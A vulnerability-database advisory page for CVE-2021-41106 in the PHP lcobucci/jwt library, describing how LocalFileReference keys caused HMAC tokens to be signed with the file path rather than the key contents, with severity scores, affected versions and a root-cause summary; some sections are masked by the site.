Miggo Logo

CVE-2021-41106: File reference keys leads to incorrect hashes on HMAC algorithms

4.4

CVSS Score
3.1

Basic Information

EPSS Score
0.08406%
Published
9/29/2021
Updated
2/6/2024
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
lcobucci/jwtcomposer>= 3.4.0, < 3.4.63.4.6
lcobucci/jwtcomposer>= 4.0.0, < 4.0.44.0.4
lcobucci/jwtcomposer>= 4.1.0, < 4.1.54.1.5

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from LocalFileReference's original implementation where the contents() method returned a file URI string instead of reading the file's contents. This is confirmed by the patch modifying contents() to load file contents via InMemory::file(), and test cases demonstrating HMAC validation failures when using path strings instead of actual key material. The direct modification of this method in the commit and deprecation notice confirm it was the root cause.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Imp**t Us*rs o* *M**-**s** *l*orit*ms (*S***, *S***, *n* *S***) *om*in** wit* `L*o*u**i\JWT\Si*n*r\K*y\Lo**l*il*R***r*n**` *s k*y *r* **vin* t**ir tok*ns issu**/v*li**t** usin* t** *il* p*t* *s **s*in* k*y - inst*** o* t** *ont*nts. T** *M** **

Reasoning

T** vuln*r**ility st*ms *rom Lo**l*il*R***r*n**'s ori*in*l impl*m*nt*tion w**r* t** `*ont*nts()` m*t*o* r*turn** * *il* URI strin* inst*** o* r***in* t** *il*'s *ont*nts. T*is is *on*irm** *y t** p*t** mo*i*yin* `*ont*nts()` to lo** *il* *ont*nts vi*